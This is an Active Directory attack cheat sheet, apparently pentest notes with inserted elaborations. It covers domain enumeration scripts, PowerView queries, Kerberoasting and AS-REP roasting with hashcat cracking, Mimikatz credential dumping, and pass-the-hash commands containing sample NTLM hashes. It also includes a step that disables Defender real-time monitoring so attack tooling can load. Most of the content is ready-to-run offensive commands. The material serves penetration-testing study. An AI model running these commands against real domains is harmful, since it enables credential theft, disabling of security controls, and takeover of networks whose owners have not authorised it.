Manual enumeration
Basic enumeration
Use the built-in net.exe application
Who are you
Enumerate all users
Enumerate all groups
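The net.exe commands the headings above refer to, as an added example that is not part of the original page: whoami for the current identity and token groups, then net user /domain and net group /domain with their three-column output parsed into one name per line. The helper name Get-NetEnum is my own; it assumes a domain-joined host.

```powershell
# Added example, not the page's own commands: net.exe enumeration with the
# columnar output made usable. Assumes a domain-joined host.
whoami /all    # current user, SID, token groups and privileges

function Get-NetEnum {
    param([ValidateSet('user', 'group')][string]$Kind)
    $lines = & net.exe $Kind /domain 2>&1 | Out-String -Stream
    $inTable = $false
    foreach ($l in $lines) {
        if ($l -match '^-{10,}') { $inTable = $true; continue }          # dashed header separator
        if ($l -match 'completed successfully') { break }                  # trailer line
        if (-not $inTable -or [string]::IsNullOrWhiteSpace($l)) { continue }
        if ($Kind -eq 'user') {
            # user names are printed three per line in fixed-width columns
            ($l -split '\s{2,}') | Where-Object { $_ } | ForEach-Object { $_.Trim() }
        } else {
            # group names are prefixed with '*' and may contain spaces
            ($l -split '\*') | Where-Object { $_.Trim() } | ForEach-Object { $_.Trim() }
        }
    }
}

Get-NetEnum user     # every domain user account
Get-NetEnum group    # global groups; domain local groups come from: net localgroup /domain
```

net.exe talks to the domain controller over SMB/RPC, so every call shows up in the DC's logs; the LDAP scripts further down are quieter and return far more attributes.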
Use a PowerShell script
Enumerate all users
```powershell
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name                  # query the PDC emulator, the most up-to-date DC
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"   # corp.local -> DC=corp,DC=local
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString)   # search root bound to the path built above
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"           # 805306368 = SAM_USER_OBJECT: user accounts only
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop                                          # prints every attribute the account exposes
    }
    Write-Host "------------------------"
}
```
Enumerate all groups
```powershell
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString)
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(objectCategory=group)"             # group objects of every scope (global, domain local, universal)
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop                                          # includes "member", the direct membership list
    }
    Write-Host "------------------------"
}
```
Service account enumeration (through SPNs)
When SQL Server, IIS or other services are integrated into Active Directory, a Service Principal Name (SPN) associates the service with the account it runs under. By enumerating the SPNs registered in the domain we learn which applications run on which servers, and which accounts back them, without touching the servers themselves.
```powershell
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString)
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"        # SPNs containing "http" (IIS etc.); use serviceprincipalname=* for every registered SPN
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop                                          # "serviceprincipalname" lists host names and ports the account serves
    }
}
```
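The three scripts above share everything except the filter. As an added example (not code from the original page), the following PowerShell collapses them into one DirectorySearcher wrapper, turns on paging so results are not silently capped at 1000 entries, and adds the filters a pentester wants on a first pass: every user with decoded userAccountControl flags, every group with its members, Kerberoast candidates (SPN set) and AS-REP roast candidates (preauthentication not required, the flag the ASREPRoasting section below abuses). The names Invoke-LdapQuery and ConvertFrom-Uac are my own; it assumes a domain-joined session.

```powershell
# Added example, not the page's own code: one DirectorySearcher wrapper
# replaces the repeated LDAP:// boilerplate. Assumes a domain-joined session.
function Invoke-LdapQuery {
    param(
        [Parameter(Mandatory)][string]$Filter,
        [string[]]$Properties = @('samaccountname'),
        [int]$PageSize = 1000
    )
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $pdc    = $domain.PdcRoleOwner.Name
    $dn     = 'DC=' + $domain.Name.Replace('.', ',DC=')
    $root   = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$pdc/$dn")
    $props  = $Properties | ForEach-Object { $_.ToLower() }      # result keys are lower-case
    $s = New-Object System.DirectoryServices.DirectorySearcher($root, $Filter, [string[]]$props)
    $s.PageSize = $PageSize                 # paged search: without it the DC stops at 1000 entries
    foreach ($r in $s.FindAll()) {
        $o = [ordered]@{}
        foreach ($p in $props) { $o[$p] = @($r.Properties[$p]) -join '; ' }   # flatten multi-valued attributes
        [pscustomobject]$o
    }
}

# userAccountControl bits worth checking on every user (ADS_USER_FLAG values).
$UacFlags = @{
    ACCOUNTDISABLE                 = 0x2
    DONT_EXPIRE_PASSWORD           = 0x10000
    TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
    DONT_REQ_PREAUTH               = 0x400000   # AS-REP roastable
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
}
function ConvertFrom-Uac([int]$Value) {
    ($UacFlags.GetEnumerator() | Where-Object { $Value -band $_.Value } | ForEach-Object Name | Sort-Object) -join ','
}

# All users with their group memberships and decoded flags
Invoke-LdapQuery '(samAccountType=805306368)' samaccountname, memberof, useraccountcontrol |
    Select-Object samaccountname, memberof, @{ n = 'flags'; e = { ConvertFrom-Uac $_.useraccountcontrol } }

# All groups (any scope) and their direct members
Invoke-LdapQuery '(objectCategory=group)' samaccountname, member

# Kerberoast candidates: enabled users with at least one SPN, krbtgt excluded
# (1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule)
Invoke-LdapQuery '(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' samaccountname, serviceprincipalname

# AS-REP roast candidates: DONT_REQ_PREAUTH (0x400000 = 4194304) set
Invoke-LdapQuery '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' samaccountname, useraccountcontrol
```

All of this is read-only LDAP against the PDC and needs nothing beyond a domain user, which is exactly why any foothold account can map the domain this way; from the defender's side, the same queries coming from a workstation that does not normally talk LDAP are worth alerting on.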
PowerView
Load the PowerShell module
Defender flags PowerView, so disable real-time monitoring before importing it (requires local admin and is itself a logged, noisy action):

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```
Domain
Domain Policy
Domain Controller
Domain Users
List all users

```powershell
Get-DomainUser
Get-DomainUser -SPN        # users with an SPN set (service accounts, Kerberoast candidates)
```

Details of a specific user

```powershell
Get-DomainUser -Identity <username>
```

Users logged on to a machine (requires local admin rights on the target)

```powershell
Get-NetLoggedon -ComputerName <computer-name>
```

List all computers in the current domain

```powershell
Get-NetComputer | select name, operatingsystem
```
Groups
List all groups in the current domain
Details of a specific group

```powershell
Get-NetGroup 'Domain Admins'
```

List local groups

```powershell
Get-NetLocalGroup | Select-Object GroupName
```

List members of the Domain Admins group (-Recurse expands nested groups)

```powershell
Get-NetGroupMember -Identity "Domain Admins" -Recurse | select MemberName
```
Shares
Find shares on hosts

```powershell
Invoke-ShareFinder -Verbose
```

List all domain shares

```powershell
Find-DomainShare
Find-DomainShare -CheckShareAccess   # only shares the current user can read
```

Find the file servers used by the domain (derived from users' homeDirectory, scriptPath and profilePath attributes, not from SPNs)

```powershell
Get-NetFileServer -Verbose
```
Group Policies
Service account attacks
Kerberoasting attack
A service ticket (TGS) is encrypted with the password hash of the service account that the SPN is registered to. Any authenticated domain user can request a ticket for any SPN, so we can ask the DC for one, extract it and attempt to crack the service account's password offline.
Find all users with an SPN set (likely service accounts)
The Invoke-Kerberoast.ps1 script automates the whole attack: it enumerates all service principal names in the domain, requests service tickets for them and exports them in a format ready for cracking with John the Ripper or Hashcat, so Mimikatz is not needed at all.

```powershell
Import-Module C:\Windows\Temp\Invoke-Kerberoast.ps1
```

```powershell
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```

```bash
hashcat -m 13100 --force -a 0 hashes.kerberoast rockyou   # 13100 = Kerberos 5 TGS-REP etype 23 (RC4); AES tickets need 19600/19700
```
ASREPRoasting
AS-REP roasting targets user accounts with the "Do not require Kerberos preauthentication" flag (DONT_REQ_PREAUTH) set. The KDC answers an AS-REQ for such an account without any proof of the password, and the AS-REP it returns contains data encrypted with the user's password hash, which can be cracked offline.
If you do not have any domain usernames yet, enumerate valid ones first:

```bash
./kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
```

Then use GetNPUsers to request the AS-REP for the account:

```bash
impacket-GetNPUsers domain.local/svc-admin -no-pass   # -no-pass: no credentials needed; output is already in hashcat format
```

Then crack the hash:

```bash
hashcat -m 18200 -a 0 hash.kerberos passwordlist.txt   # 18200 = Kerberos 5 AS-REP etype 23
```
Lateral movement
Mimikatz - cached credentials
Dump the credentials of all logged-on users (requires SeDebugPrivilege, i.e. local admin):

```powershell
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
```

Dump Kerberos TGTs and service tickets (add /export to write them out as .kirbi files):

```powershell
mimikatz.exe "privilege::debug" "sekurlsa::tickets" exit
```
Pass the hash
Allows an attacker to authenticate to a remote system or service with a user's NTLM hash instead of the plaintext password. The hash is given as LM:NT; aad3b435b51404eeaad3b435b51404ee is the empty LM hash and can be used whenever LM hashes are not stored.

```bash
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
```

```bash
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e Administrator@10.0.0.4
```

```powershell
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:jeff /domain:domain /ntlm:d4ad8b9f8ccb87f6d02d7388157ae" exit   # spawns cmd.exe running with the injected credentials
```